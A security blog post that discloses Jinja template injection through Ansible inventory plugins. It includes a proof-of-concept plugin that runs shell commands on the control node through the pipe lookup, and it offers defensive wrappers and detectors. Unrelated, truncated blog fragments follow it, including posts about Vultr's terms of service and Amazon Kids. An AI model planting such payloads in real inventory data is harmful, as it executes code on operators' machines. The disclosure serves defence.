I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources.

The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud, or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any).

But it can also set any arbitrary variable for that host, which is often used to provide additional information about it.

These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things get interesting.

Somebody could add a comment to a host, and that comment would be visible to you when you use the inventory with that host.

And if that comment contains a Jinja expression, it might get executed.

And if that Jinja expression uses the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

    from ansible.plugins.inventory import BaseInventoryPlugin


    class InventoryModule(BaseInventoryPlugin):

        NAME = 'evgeni.inventoryrce.inventory'

        def verify_file(self, path):
            # Only accept configuration files whose name ends in 'evgeni.yml'
            valid = False
            if super(InventoryModule, self).verify_file(path):
                if path.endswith('evgeni.yml'):
                    valid = True
            return valid

        def parse(self, inventory, loader, path, cache=True):
            super(InventoryModule, self).parse(inventory, loader, path, cache)
            self.inventory.add_host('exploit.example.com')
            self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
            # The value is a plain string that happens to contain a Jinja expression
            self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

- defines the plugin name as evgeni.inventoryrce.inventory

- accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)

- adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc.

But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file.

As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
    {
        "_meta": {
            "hostvars": {
                "exploit.example.com": {
                    "ansible_connection": "local",
                    "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
                }
            }
        },
        "all": {
            "children": [
                "ungrouped"
            ]
        },
        "ungrouped": {
            "hosts": [
                "exploit.example.com"
            ]
        }
    }

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened.

The inventory got generated, the host is present, the funny variable is set, but it's still only a string.
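Since the value is still just a string at this point, this is also a convenient place to look for suspicious data before any playbook touches it. The following is a minimal sketch, not part of Ansible: it assumes the JSON layout printed by ansible-inventory --list (hostvars under "_meta") and simply flags values containing Jinja delimiters. The function names and the marker list are my own, and a match is only a hint that a value deserves a closer look.

```python
import json

# Delimiters Jinja uses for expressions, statements and comments.
JINJA_MARKERS = ("{{", "{%", "{#")


def _contains_marker(value):
    """Recursively check strings, dicts and lists for Jinja delimiters."""
    if isinstance(value, str):
        return any(marker in value for marker in JINJA_MARKERS)
    if isinstance(value, dict):
        return any(_contains_marker(k) or _contains_marker(v) for k, v in value.items())
    if isinstance(value, list):
        return any(_contains_marker(item) for item in value)
    return False


def find_templated_hostvars(inventory_json):
    """Return sorted (host, variable) pairs whose value contains a Jinja delimiter.

    `inventory_json` is assumed to be the text printed by
    `ansible-inventory --list`.
    """
    data = json.loads(inventory_json)
    hostvars = data.get("_meta", {}).get("hostvars", {})
    hits = []
    for host, variables in hostvars.items():
        for name, value in variables.items():
            if _contains_marker(value):
                hits.append((host, name))
    return sorted(hits)
```

Feeding it the output above would report the pair ("exploit.example.com", "something_funny"). It is a heuristic for auditing, not a fix: it only covers variables, not host or group names, and a value can be legitimate and still contain braces.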

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used.

This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set.

Let's use that!

    - hosts: all
      tasks:
        - name: Display all variables/facts known for a host
          ansible.builtin.debug:
            var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug.

No mention of our funny variable.

Yet, when we execute it, we see:

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
    PLAY [all] ************************************************************************************************

    TASK [Gathering Facts] ************************************************************************************
    ok: [exploit.example.com]

    TASK [Display all variables/facts known for a host] *******************************************************
    ok: [exploit.example.com] => {
        "hostvars[inventory_hostname]": {
            "ansible_all_ipv4_addresses": [
                "192.168.122.1"
            ],
            "something_funny": ""
        }
    }

    PLAY RECAP *************************************************************************************************
    exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0

We got all variables dumped, that was expected, but now something_funny is an empty string?

Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }}, and touch does not print anything.

But it did create the file!

% ls -alh /tmp/hacked

-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed.

It could also have used the url lookup to send the contents of your Ansible vault to some internet host.

Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/...

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

    from ansible.utils.unsafe_proxy import wrap_var

    self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

    "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

    for k, v in host_vars.items():
        self.inventory.set_variable(name, k, v)

(aws_ec2.py)

    for key, value in hostvars.items():
        self.inventory.set_variable(hostname, key, value)

(hcloud.py)

    for k, v in hostvars.items():
        try:
            self.inventory.set_variable(host_name, k, v)
        except ValueError as e:
            self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that.

When developing an inventory, you do not expect to handle insecure input data.

You also expect the API to handle the data in a secure way by default.

But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".
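Until that changes, a plugin author could approximate "unsafe by default" with a small helper around the loops shown above. This is only a sketch under assumptions: set_untrusted_variables and its wrap parameter are hypothetical names of mine, not Ansible API. The only real Ansible pieces are inventory.set_variable() and wrap_var from ansible.utils.unsafe_proxy, which is imported lazily so the helper can be exercised without Ansible installed.

```python
def set_untrusted_variables(inventory, host, hostvars, wrap=None):
    """Set every variable in `hostvars` on `host`, marking each value as unsafe.

    `inventory` is anything with a set_variable(host, key, value) method,
    such as self.inventory inside an inventory plugin. `wrap` exists for
    testing and defaults to Ansible's wrap_var.
    """
    if wrap is None:
        # Lazy import: only needed when running inside Ansible.
        from ansible.utils.unsafe_proxy import wrap_var as wrap
    for key, value in hostvars.items():
        inventory.set_variable(host, key, wrap(value))
```

Inside a plugin's parse() this would replace the plain loop, e.g. set_untrusted_variables(self.inventory, host_name, hostvars). It does nothing for host or group names, and I have only reasoned about it against the versions mentioned in this post.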

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

    from ansible.plugins.inventory import BaseInventoryPlugin


    class InventoryModule(BaseInventoryPlugin):

        NAME = 'evgeni.inventoryrce.inventory'

        def verify_file(self, path):
            valid = False
            if super(InventoryModule, self).verify_file(path):
                if path.endswith('evgeni.yml'):
                    valid = True
            return valid

        def parse(self, inventory, loader, path, cache=True):
            super(InventoryModule, self).parse(inventory, loader, path, cache)
            # This time the Jinja expression is part of the host name itself
            self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
    PLAY [all] ************************************************************************************************

    TASK [Gathering Facts] ************************************************************************************
    fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

    PLAY RECAP ************************************************************************************************
    lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0

% ls -alh /tmp/hacked-host

-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
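Host names are harder to mark as unsafe, so a plugin might instead refuse names that do not look like host names at all before calling add_host(). A minimal sketch, assuming a deliberately strict rule of my own (letters, digits, dots, hyphens and underscores, at most 253 characters); is_safe_hostname is a hypothetical helper, not something Ansible provides, and the rule would reject legitimate entries such as IPv6 addresses.

```python
import re

# Strict allow-list: must start with a letter or digit, then only
# letters, digits, dots, hyphens and underscores. This is an assumption
# chosen for the sketch, not a rule taken from Ansible.
_SAFE_HOSTNAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def is_safe_hostname(name):
    """Return True if `name` consists only of allow-listed characters."""
    return (
        isinstance(name, str)
        and len(name) <= 253
        and _SAFE_HOSTNAME.fullmatch(name) is not None
    )
```

A plugin could then skip (and warn about) any host for which is_safe_hostname() returns False, which would have rejected the "lol" host above because of the braces, quotes and spaces in its name.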

Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4.

I'd totally expect older versions to be affected too, but I have not verified that.

Turns out that VPS provider Vultr's terms of service were quietly changed some time ago to give them a "perpetual, irrevocable" license to use content hosted there in any way, including modifying it and commercializing it "for purposes of providing the Services to you."

This is very similar to changes that GitHub made to their TOS in 2017. Since then, GitHub has been rebranded as "The world's leading AI-powered developer platform". The language in their TOS now clearly lets them use content stored in GitHub for training AI. (Probably this is their second line of defense if the current attempt to legitimise copyright laundering via generative AI fails.)

Vultr is currently in damage control mode, accusing their concerned customers of spreading "conspiracy theories" (-- founder David Aninowsky) and updating the TOS to remove some of the problem language. It still allows them to "make derivative works", though, so it could still allow their AI division to scrape VPS images for training data.

Vultr claims this was the legalese version of technical debt, that it only ever applied to posts in a forum (not supported by the actual TOS language) and basically that they and their lawyers are incompetent but not malicious.

Maybe they are indeed incompetent. But even if I give them the benefit of the doubt, I expect that many other VPS providers, especially ones targeting non-corporate customers, are watching this closely. If Vultr is not significantly harmed by customers jumping ship, if the latest TOS change is accepted as good enough, then other VPS providers will know that they can try this TOS trick too. If Vultr's AI division does well, others will wonder to what extent it is due to having all this juicy training data.

For small self-hosters, this seems like a good time to make sure you're using a VPS provider you can actually trust to not be eyeing your disk image and salivating at the thought of strip-mining it for decades of emails. Probably also worth thinking about moving to bare metal hardware, perhaps hosted at home.

I wonder if this will finally make it worthwhile to mess around with VPS TPMs?


One of the most common fallacies programmers fall into is that we will jump to automating a solution before we stop and figure out how much time it would even save.

In taking a slow improvement route to solve this problem for myself, I've managed not to invest too much time

The Amazon Kids parental controls are extremely insufficient, and I strongly advise against getting any of the Amazon Kids series.

The initial premise (and some older reviews) look okay: you can set some time limits, and you can disable anything that requires buying.

With the hardware you get one year of the Amazon Kids+ subscription, which includes a lot of interesting content such as books and audio, but also some apps. This seemed attractive: some learning apps, some decent games.

Sometimes there seems to be a special Amazon Kids+ edition, supposedly one that has advertisements reduced/removed and no purchasing.

However, there are so many things just wrong in Amazon Kids:


A first revision of the still only one-week old (at

Closing arguments in the trial between various people and

Like each month, have a look at the work funded by

The image here comes from an example of building

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a



My brain is currently suffering from an overload caused by grading student assignments.

In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work.

I use Moodle for all the classes I teach and students use it to hand in their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and comment on them
